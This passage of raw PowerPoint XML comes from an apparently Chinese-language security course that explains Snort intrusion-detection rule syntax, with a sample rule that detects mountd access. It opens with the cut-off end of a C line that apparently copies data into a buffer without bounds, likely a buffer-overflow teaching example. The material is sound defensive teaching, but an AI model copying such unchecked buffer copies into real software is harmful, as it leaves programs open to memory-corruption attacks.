            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>*)buffer,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>*)data); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>}  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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35BD6CC6-8705-484D-940C-A988DF794AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则（2）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223235" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D69FA6A8-995B-4DD9-8560-5982B2813BDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366713" y="2165350"/>
            <a:ext cx="8743950" cy="4692650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则描述语言举例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>alert tcp any any -&gt; 192.168.1.0/24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>content:"|00 01 86 a5|";msg:"mountd access";)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>从开头到最左边的括号属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则头部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，括号内的部分属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。规则选项中冒号前面的词叫做选项关键词</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注意对于每条规则来说规则选项不是必需的，它们是为了更加详细地定义应该收集或者报警的数据包。只有匹配所有选项的数据包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>才会执行其规则行为。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139235297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279B5E41-6F20-4596-B0C0-09654D2FF058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则（3）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225283" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7CF7148-443D-4D18-99E9-8A32A6413A38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>规则头：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>哪些数据包、数据包的来源、什么类型的数据包，以及对匹配的数据包如何处理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>规则行为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rule action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用选定的报警方法产生报警信息，并且记录数据包；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>记录数据包；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>忽略数据包；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>报警，接着打开其它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>规则；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>保持空闲状态，直到被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>规则激活，作为一条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>规则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22414785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A6372460-6610-4B5F-8624-EEF92336906F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则（4）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226307" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D84DA271-3005-4D8D-A75A-2FD94F743B04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827088" y="1844675"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>每条规则的第二项就是协议项。当前，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>能够分析的协议是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCP、UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ICMP。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将来，可能提供对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ARP、ICRP、GRE、OSPF、RIP、IPX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等协议的支持。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则头下面的部分就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址和端口信息。关键词</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以用来定义任意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址。/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CIDR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的形式用于指明应用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址的掩码。/24表示一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>类网络；/16表示一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>类网络；而/32表示一台特定的主机地址。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35888977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E59E7946-064D-42AC-8A56-6EC0D75CA938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
